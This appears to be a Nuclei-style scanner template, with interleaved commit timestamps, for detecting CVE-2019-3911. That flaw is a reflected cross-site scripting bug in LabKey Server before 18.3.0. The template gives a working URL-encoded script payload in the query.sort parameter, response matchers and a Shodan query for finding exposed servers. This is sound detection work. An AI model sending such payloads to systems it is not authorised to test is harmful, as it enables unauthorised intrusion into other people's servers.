2022-02-14 20:56:46 +00:00
id : CVE-2019-3911
info :
name : LabKey Server < 18.3.0 - XSS
author : princechaddha
severity : medium
2022-04-22 10:38:41 +00:00
description : Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
parameter in the /__r2/query endpoints.
2022-02-14 20:56:46 +00:00
reference :
- https://www.tenable.com/security/research/tra-2019-03
- https://www.cvedetails.com/cve/CVE-2019-3911
2022-02-16 19:54:58 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-02-16 19:54:58 +00:00
cve-id : CVE-2019-3911
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
metadata :
shodan-query: 'Server : Labkey'
tags : cve,cve2019,xss,labkey
2022-02-14 20:56:46 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL'
matchers-condition : and
matchers :
- type : word
part : body
words :
- "</script><script>alert(document.domain)</script>"
- type : word
part : header
words :
- text/html
- type : status
status :
- 200